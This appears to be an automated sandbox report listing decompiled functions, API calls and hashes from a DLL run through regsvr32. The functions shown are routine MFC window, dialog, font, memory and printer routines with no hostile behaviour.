Instruction ID: c20c66116e7296d4a0afd5037f2dffc74684b1862cb446d2da729e570b87d5d5
Opcode Fuzzy Hash: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
Instruction Fuzzy Hash: 3611C076C04266EBFB10DFA9ACC45097BE5E74F2D8301423FEA05A2124D7720980CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB74, Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CB74(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				struct HINSTANCE__* _t95;
				signed int _t96;
				void* _t97;
				signed int _t99;
				void* _t100;
				void* _t101;

				_t101 = __eflags;
				_push(0x24);
				E10017BF4(E10028029, __ebx, __edi, __esi);
				_t99 = __ecx;
				 *((intOrPtr*)(_t100 - 0x20)) = __ecx;
				 *(_t100 - 0x1c) =  *(__ecx + 0x60);
				 *(_t100 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1000D5EC(__ebx, __edi, __ecx, _t101);
				_t95 =  *(_t54 + 0xc);
				_t84 = 0;
				_t102 =  *(_t99 + 0x58);
				if( *(_t99 + 0x58) != 0) {
					_t95 =  *(E1000D5EC(0, _t95, _t99, _t102) + 0xc);
					_t54 = LoadResource(_t95, FindResourceA(_t95,  *(_t99 + 0x58), 5));
					 *(_t100 - 0x18) = _t54;
				}
				if( *(_t100 - 0x18) != _t84) {
					_t54 = LockResource( *(_t100 - 0x18));
					 *(_t100 - 0x1c) = _t54;
				}
				if( *(_t100 - 0x1c) != _t84) {
					_t86 = _t99;
					 *(_t100 - 0x14) = E1000C6AC(_t84, _t99, __eflags);
					E1000FC04(_t84, _t95, __eflags);
					 *(_t100 - 0x28) =  *(_t100 - 0x28) & _t84;
					__eflags =  *(_t100 - 0x14) - _t84;
					 *(_t100 - 0x2c) = _t84;
					 *(_t100 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t100 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t100 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t100 - 0x14), 0);
								 *(_t100 - 0x2c) = 1;
								_t84 = E1000A7CE();
								__eflags = _t84;
								 *(_t100 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E100128F8(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E10012913(_t84, 0);
											 *(_t100 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
					E100115DC(_t95, __eflags, _t99);
					_t58 = E1000FB5C(_t84, _t86, _t100,  *(_t100 - 0x14));
					_push(_t95);
					_push(_t58);
					_push( *(_t100 - 0x1c));
					_t59 = L1000C984(_t84, _t99, _t95, _t99, __eflags);
					_t96 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t99 + 0x3c) & 0x00000010;
						if(( *(_t99 + 0x3c) & 0x00000010) != 0) {
							_t97 = 4;
							_t71 = E10012862(_t99);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t97 = 5;
							}
							E1000F6F2(_t99, _t97);
							_t96 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t99 + 0x20)) - _t96;
						if( *((intOrPtr*)(_t99 + 0x20)) != _t96) {
							E1001297A(_t99, _t96, _t96, _t96, _t96, _t96, 0x97);
						}
					}
					 *(_t100 - 4) =  *(_t100 - 4) | 0xffffffff;
					__eflags =  *(_t100 - 0x28) - _t96;
					if( *(_t100 - 0x28) != _t96) {
						E10012913(_t84, 1);
					}
					__eflags =  *(_t100 - 0x2c) - _t96;
					if( *(_t100 - 0x2c) != _t96) {
						EnableWindow( *(_t100 - 0x14), 1);
					}
					__eflags =  *(_t100 - 0x14) - _t96;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t99 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t100 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t99 + 0x60))();
					E1000C6E6(_t84, _t99, _t96, _t99, __eflags);
					__eflags =  *(_t99 + 0x58) - _t96;
					if( *(_t99 + 0x58) != _t96) {
						FreeResource( *(_t100 - 0x18));
					}
					_t63 =  *(_t99 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E10017C60(_t63);
				}
			}

0x1000cb74
0x1000cb74
0x1000cb7b
0x1000cb80
0x1000cb82
0x1000cb88
0x1000cb8e
0x1000cb91
0x1000cb96
0x1000cb99
0x1000cb9b
0x1000cb9e
0x1000cba5
0x1000cbb6
0x1000cbbc
0x1000cbbc
0x1000cbc2
0x1000cbc7
0x1000cbcd
0x1000cbcd
0x1000cbd3
0x1000cbdd
0x1000cbe4
0x1000cbe7
0x1000cbec
0x1000cbef
0x1000cbf2
0x1000cbf5
0x1000cbf8
0x1000cc00
0x1000cc03
0x1000cc0e
0x1000cc10
0x1000cc17
0x1000cc1d
0x1000cc29
0x1000cc2b
0x1000cc2d
0x1000cc30
0x1000cc34
0x1000cc3c
0x1000cc3e
0x1000cc40
0x1000cc47
0x1000cc49
0x1000cc4d
0x1000cc4f
0x1000cc54
0x1000cc54
0x1000cc49
0x1000cc3e
0x1000cc30
0x1000cc10
0x1000cc03
0x1000cc5b
0x1000cc60
0x1000cc68
0x1000cc6d
0x1000cc6e
0x1000cc6f
0x1000cc74
0x1000cc79
0x1000cc7b
0x1000cc7d
0x1000cc7f
0x1000cc83
0x1000cc87
0x1000cc8a
0x1000cc8f
0x1000cc93
0x1000cc97
0x1000cc97
0x1000cc9b
0x1000cca0
0x1000cca0
0x1000cca0
0x1000cca2
0x1000cca5
0x1000ccb3
0x1000ccb3
0x1000cca5
0x1000ccb8
0x1000ccdb
0x1000ccde
0x1000cce4
0x1000cce4
0x1000cce9
0x1000ccec
0x1000ccf3
0x1000ccf3
0x1000ccf9
0x1000ccfc
0x1000cd04
0x1000cd07
0x1000cd0c
0x1000cd0c
0x1000cd07
0x1000cd16
0x1000cd1b
0x1000cd20
0x1000cd23
0x1000cd28
0x1000cd28
0x1000cd2e
0x00000000
0x1000cbd5
0x1000cbd5
0x1000cd31
0x1000cd36
0x1000cd36

APIs

__EH_prolog3_catch.LIBCMT ref: 1000CB7B
FindResourceA.KERNEL32(?,?,00000005), ref: 1000CBAE
LoadResource.KERNEL32(?,00000000), ref: 1000CBB6
LockResource.KERNEL32(?,00000024,100014EC,00000000,E86D94F5), ref: 1000CBC7
GetDesktopWindow.USER32 ref: 1000CBFA
IsWindowEnabled.USER32(?), ref: 1000CC08
EnableWindow.USER32(?,00000000), ref: 1000CC17

Part of subcall function 100128F8: IsWindowEnabled.USER32(?), ref: 10012901

Part of subcall function 10012913: EnableWindow.USER32(?,E86D94F5), ref: 10012920

EnableWindow.USER32(?,00000001), ref: 1000CCF3
GetActiveWindow.USER32 ref: 1000CCFE
SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,E86D94F5), ref: 1000CD0C
FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,E86D94F5), ref: 1000CD28

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
Instruction ID: 8f78f448105f665873ac1cd7b5fa33a3343bcf420d8a1ae80c8a79bff85a7528
Opcode Fuzzy Hash: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
Instruction Fuzzy Hash: A251BF34A007098BFF11DFA5C999EAEBBF1EF44781F20002EE506A6195CB759E41CF55

Uniqueness

Uniqueness Score: -1.00%

Function 10011245, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10011245(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E10017BF4(E1002864B, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E1000FB5C(1, _t60, _t71,  *(_t71 + 0x14));
					E10011159(_t60, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E100111CF(1, _t66, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E1000E865(E1000FB5C(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E100100F3(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E10017C60( *(_t71 - 0x14));
			}

0x10011245
0x10011245
0x10011245
0x1001124c
0x10011251
0x10011254
0x1001125b
0x10011261
0x10011265
0x10011269
0x10011271
0x10011272
0x10011275
0x1001131e
0x10011330
0x00000000
0x1001127b
0x1001127b
0x1001127e
0x10011316
0x10011335
0x10011337
0x00000000
0x00000000
0x10011280
0x10011280
0x10011283
0x100112dc
0x100112e4
0x100112f2
0x00000000
0x10011285
0x1001128a
0x10011339
0x1001134c
0x10011290
0x100112a1
0x100112be
0x100112c6
0x100112c6
0x1001128a
0x10011283
0x1001127e
0x100112d3

APIs

__EH_prolog3_catch.LIBCMT ref: 1001124C
GetPropA.USER32 ref: 1001125B
CallWindowProcA.USER32 ref: 100112B5

Part of subcall function 100100F3: GetWindowRect.USER32 ref: 1001011B
Part of subcall function 100100F3: GetWindow.USER32(?,00000004), ref: 10010138

SetWindowLongA.USER32(?,000000FC,?), ref: 100112DC
RemovePropA.USER32 ref: 100112E4
GlobalFindAtomA.KERNEL32 ref: 100112EB
GlobalDeleteAtom.KERNEL32 ref: 100112F2

Part of subcall function 1000E865: GetWindowRect.USER32 ref: 1000E871

CallWindowProcA.USER32 ref: 10011346

Strings

AfxOldWndProc423, xrefs: 10011254, 10011259, 100112E2, 100112EA

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
Instruction ID: 0d19250562dc5a9dad551a697ef26f9b08052b09a3581b526b6705a222a2b98b
Opcode Fuzzy Hash: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
Instruction Fuzzy Hash: 2D317F7680021ABBDF05DFA0CD89EFF7FB9FF05651F100118F611A6051DB359A61ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 100149BE, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E100149BE(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x10057a08; // 0xe86d94f5
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E100167D5(E1001486F(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

0x100149c4
0x100149cb
0x100149d0
0x100149d9
0x100149dc
0x100149df
0x100149e4
0x100149e8
0x100149f2
0x10014a01
0x10014a05
0x10014a12
0x10014a14
0x10014a16
0x10014a16
0x10014a31
0x10014a34
0x10014a34
0x10014a3a
0x10014a3a
0x10014a40
0x10014a42
0x10014a42
0x10014a5d
0x10014a5d
0x100149ec
0x100149f0
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 100149E4
GetStockObject.GDI32(0000000D), ref: 100149EC
GetObjectA.GDI32(00000000,0000003C,?), ref: 100149F9
GetDC.USER32(00000000), ref: 10014A08
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10014A1C
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10014A28
ReleaseDC.USER32 ref: 10014A34

Strings

System, xrefs: 100149DF, 10014A49

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
Instruction ID: a63e4a091ca1b7be2859df30e5517b7a4abcdff67d16382c886f5131b7cbdf71
Opcode Fuzzy Hash: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
Instruction Fuzzy Hash: 39118F71A40268EBEB10DBA1CC85FAE7BB8FF04781F420015FA02AA190DE709D46CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10009360, Relevance: 13.6, APIs: 9, Instructions: 105
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10009360(intOrPtr __ecx, intOrPtr _a4) {
				long _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				signed int _t38;
				long _t49;
				intOrPtr _t50;
				void* _t60;
				long _t76;
				void* _t84;
				void* _t85;

				_v32 = __ecx;
				if(_a4 == 8) {
					return E100090F0(_t60, _v32, _t84, _t85);
				}
				if(_a4 == 9) {
					_t38 =  *0x10058ece & 0x000000ff;
					if(_t38 != 0) {
						_v8 = SendMessageA( *(_v32 + 0x94), 0xe, 0, 0);
						_v12 = _v32 + 0x74;
						SendMessageA( *(_v12 + 0x20), 0xb1, _v8, _v8);
						if(0 == 0) {
							SendMessageA( *(_v12 + 0x20), 0xb7, 0, 0);
						}
						_t76 =  *0x10058f0c; // 0x1005aa2c
						_v16 = _t76;
						SendMessageA( *(_v32 + 0x94), 0xc2, 0, _v16);
						if(_v8 > 0x1000) {
							_t50 =  *0x10058f0c; // 0x1005aa2c
							_t21 = _t50 - 0xc; // 0x0
							_v20 =  *_t21;
							_v24 = _v32 + 0x74;
							SendMessageA( *(_v24 + 0x20), 0xb1, 0, _v20);
							if(0 == 0) {
								SendMessageA( *(_v24 + 0x20), 0xb7, 0, 0);
							}
							SendMessageA( *(_v32 + 0x94), 0xc2, 0, 0x100295fc);
						}
						_v28 = SendMessageA( *(_v32 + 0x94), 0xba, 0, 0);
						_t49 = SendMessageA( *(_v32 + 0x94), 0xb6, 0, _v28);
						 *0x10058ece = 0;
						return _t49;
					}
				}
				return _t38;
			}

0x10009366
0x1000936d
0x00000000
0x10009372
0x10009380
0x10009386
0x1000938f
0x100093ab
0x100093b4
0x100093cb
0x100093d3
0x100093e5
0x100093e5
0x100093eb
0x100093f1
0x10009409
0x10009416
0x10009418
0x1000941d
0x10009420
0x10009429
0x1000943e
0x10009446
0x10009458
0x10009458
0x10009474
0x10009474
0x10009493
0x100094ab
0x100094b1
0x00000000
0x100094b1
0x1000938f
0x100094bb

APIs

SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 100093A5
SendMessageA.USER32(?,000000B1,?,?), ref: 100093CB
SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 100093E5
SendMessageA.USER32(?,000000C2,00000000,?), ref: 10009409
SendMessageA.USER32(?,000000B1,00000000,?), ref: 1000943E
SendMessageA.USER32(00000000,000000B7,00000000,00000000), ref: 10009458
SendMessageA.USER32(?,000000C2,00000000,100295FC), ref: 10009474
SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 1000948D
SendMessageA.USER32(?,000000B6,00000000,?), ref: 100094AB

Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091CA
Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091E4

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$_strlen
String ID:
API String ID: 3697954797-0
Opcode ID: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
Instruction ID: 329eb70852e0cb7846d89551eaf01311ead5dc39bdcc3cc6f9670776eeec1b90
Opcode Fuzzy Hash: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
Instruction Fuzzy Hash: BE411974A40205AFEB04CBA4CD99FAEB7B5FB4C740F208159FA45AB3D5C775AA02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013C4D, Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E10013C4D(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E10017BF4(E10028893, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E10013965(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x1002b1d8;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E10013A82( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E100134F9(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E100134F9(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E1000A0A7(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E100174D0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E10017C60(_t36);
			}

0x10013c4d
0x10013c54
0x10013c59
0x10013c5b
0x10013c5e
0x10013c62
0x10013c65
0x10013c6b
0x10013c72
0x10013d73
0x10013c81
0x10013c89
0x10013c8d
0x10013cc1
0x10013cc4
0x10013cc9
0x10013ccb
0x10013cd7
0x10013cd7
0x10013ccd
0x10013ccd
0x10013cd3
0x10013cd3
0x10013cd9
0x10013cde
0x10013ce1
0x10013ce4
0x10013ce7
0x00000000
0x10013c8f
0x10013c8f
0x10013c95
0x10013ca4
0x10013ca4
0x10013ca7
0x10013d0b
0x10013d11
0x10013d16
0x10013ca9
0x10013cae
0x10013cb4
0x10013cb7
0x10013cb7
0x10013d1c
0x10013d1e
0x10013d23
0x10013d29
0x10013d29
0x10013d31
0x10013d42
0x10013d4e
0x10013d53
0x10013d59
0x10013d59
0x10013c95
0x10013d5c
0x10013d61
0x10013d6b
0x10013d6b
0x10013d6e
0x10013d6e
0x10013d74
0x10013d7f

APIs

__EH_prolog3_catch.LIBCMT ref: 10013C54
EnterCriticalSection.KERNEL32(?,00000010,10013E18,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013C65
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013C83
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013CB7
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
_memset.LIBCMT ref: 10013D42
TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
Instruction ID: 361604de1dd3242a2b5db774f8c39e7d6c7c8771dcfb3c7945be7f3a81b5ec95
Opcode Fuzzy Hash: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
Instruction Fuzzy Hash: 3F317C74500616AFDB20DF65E886C5EBBB5FF04350B21C529F95AAB661CB30ED90CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000A6E3, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000A6E3(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E10014056(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10014056( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x1000a6e6
0x1000a6e8
0x1000a6ea
0x1000a6f2
0x1000a70c
0x1000a714
0x1000a71e
0x1000a725
0x1000a727
0x1000a72c
0x1000a72f
0x1000a72f
0x1000a746
0x1000a74d
0x1000a765
0x1000a76a
0x1000a76f
0x1000a76f
0x1000a775
0x1000a775
0x1000a725
0x1000a77a
0x1000a77e

APIs

GlobalLock.KERNEL32 ref: 1000A700
lstrcmpA.KERNEL32(?,?), ref: 1000A70C
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1000A71E
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A73E
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A746
GlobalLock.KERNEL32 ref: 1000A750
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1000A75D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1000A775

Part of subcall function 10014056: GlobalFlags.KERNEL32(?), ref: 10014061
Part of subcall function 10014056: GlobalUnlock.KERNEL32(?,?,?,1000A4C2,?,00000004,1000146F), ref: 10014073
Part of subcall function 10014056: GlobalFree.KERNEL32 ref: 1001407E

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
